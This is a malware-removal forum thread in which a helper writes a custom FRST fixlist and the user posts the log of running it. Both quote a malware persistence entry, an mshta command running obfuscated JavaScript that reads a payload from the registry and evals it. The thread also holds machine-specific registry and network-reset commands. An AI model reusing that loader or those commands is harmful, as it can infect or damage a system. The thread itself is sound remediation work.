FirewallRules: [TCP Query User{12D1A36E-E588-471C-A733-0AAED90E0A96}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => (Allow) C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [UDP Query User{29FFD94E-99E7-473A-A2E0-FE6F191742A7}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => (Allow) C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [{95C62BB0-D859-4E2A-A64D-8D8BBA8713A8}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{A913A0C9-B9F1-41E5-9390-AEFE15BA282E}] => (Allow) C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{4CC961E5-0940-4383-A41A-33B1D705CA94}] => (Allow) C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{27C90A35-DF5A-4E93-81EF-A588F39C847B}] => (Allow) C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{4F12C549-3FEB-4BEB-84FF-242D4191D08B}] => (Allow) C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{DF3D7CBC-116B-41C7-80CF-EDBF386A68ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{07751770-2A7C-4575-8FA9-97329195C28E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{807F2D7A-B2ED-429A-AE1E-B61DF684C77C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4CD107E7-A2A0-4768-96A3-228E003EE820}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A20F1399-AB43-4ECC-A227-35DC9F054463}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-11-2015 04:00:44 Windows Update
26-11-2015 06:06:46 Windows Update
23-01-2016 23:14:41 Windows Update
21-02-2016 09:37:25 Scheduled Checkpoint
28-02-2016 14:02:23 Scheduled Checkpoint
23-03-2016 18:16:58 Scheduled Checkpoint
25-11-2016 17:41:05 Installed HP Support Assistant
25-11-2016 18:46:00 Windows Modules Installer
26-11-2016 04:54:50 Windows Modules Installer
26-11-2016 04:56:47 Windows Modules Installer
26-11-2016 04:59:57 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/29/2016 02:43:31 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 08:45:25 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 02:02:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 09:10:38 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/27/2016 02:43:06 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/27/2016 09:23:08 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 09:48:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18098 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1360

Start Time: 01d24857f9a2287a

Termination Time: 1954

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (11/26/2016 08:36:33 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 07:13:47 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 06:57:23 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x80070565, The maximum number of secrets that may be stored in a single system has been exceeded.
.


System errors:
=============
Error: (11/29/2016 05:48:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Amsp service.

Error: (11/29/2016 03:48:52 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/29/2016 02:30:16 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (11/29/2016 08:32:41 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (11/29/2016 08:31:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/29/2016 08:31:20 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.

Error: (11/28/2016 11:58:22 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/28/2016 10:58:21 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/28/2016 10:56:21 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Wlansvc service.

Error: (11/28/2016 10:56:21 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.


==================== Memory info ===========================

Processor: AMD Athlon™ II P340 Dual-Core Processor
Percentage of memory in use: 52%
Total physical RAM: 2810.9 MB
Available physical RAM: 1323.04 MB
Total Virtual: 5620.01 MB
Available Virtual: 3070.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:281.48 GB) (Free:201.92 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.31 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 82337274)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=281.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================

 


  • 0



#2
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Hi! My name is zep516 and welcome to Geekstogo!
I'll do the best I can to resolve your computer issue.
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue. Stop and ask! Never be afraid to ask questions! :)

Uninstall these programs
  • Free Ride Games Player
  • Internet Explorer Toolbar 4.8 by SweetPacks
  • Pogo Games

    Next

    A few items to fix
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
    Open Notepad (Start => All Programs => Accessories => Notepad).
    Copy/Paste the contents of the code box below into Notepad.
    start
    CloseProcesses:
    CreateRestorePoint:
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
    HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
    SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
    SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
    SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
    SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
    SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
    SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
    SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
    SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
    SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
    SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
    SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
    SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
    SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
    BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
    BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
    BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
    Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
    FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION
    R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)
    2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
    2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
    Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
    AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
    AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
    AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"
    HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION
    DeleteKey: HKCU\\software\\zorrezmj 
    DeleteKey: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30
    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    CMD: bitsadmin /reset /allusers
    CMD: netsh winsock reset catalog
    CMD: ipconfig /flushdns
    RemoveProxy:
    hosts:
    Emptytemp:
    
  • Click Format and ensure Wordwrap is unchecked.
  • Save as Fixlist.txt to your Desktop (Must be in this location)
  • Run FRST/FRST64 and press the Fix button just once and wait.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after the restart.
  • The tool will make a log on the Desktop (Fixlog.txt). Please post it in your next reply.
Note: If the tool warns you that the version you're using is outdated, please download and run the updated version.
  • 0

#3
dreamtime

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Thanks for responding. I couldn't uninstall Internet Explorer Toolbar 4.8 by SweetPacks from Control Panel. It said the uninstall file couldn't be found. Everything else has been done. Here is the log for you.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Owner (30-11-2016 15:09:31) Run:1
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION
R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)
2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION
DeleteKey: HKCU\\software\\zorrezmj
DeleteKey: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**cahlhsssc<*> => value not found.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDesktopCleanupWizard => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE => value removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA}" => key removed successfully
HKCR\CLSID\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\Wow6432Node\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\Wow6432Node\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA}" => key removed successfully
HKCR\Wow6432Node\CLSID\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\Wow6432Node\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F}" => key removed successfully
HKCR\CLSID\{DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F282B65-56BF-4BD1-A8B2-A4449A05863D}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{6F282B65-56BF-4BD1-A8B2-A4449A05863D}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => value removed successfully
HKCR\Wow6432Node\CLSID\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\www.exent.com/GameTreatWidget => key not found.
C:\Program Files (x86)\mozilla firefox\firefox.cfg => moved successfully
X5XSEx_Pr143 => service not found.
C:\Windows\SysWOW64\sho214.tmp => moved successfully
C:\Windows\SysWOW64\shoAE78.tmp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EDE4CF83-5407-4471-B818-DC680F968903}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EDE4CF83-5407-4471-B818-DC680F968903}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TidyNetwork Update" => key removed successfully
C:\ProgramData\Temp => ":426D1496" ADS removed successfully.
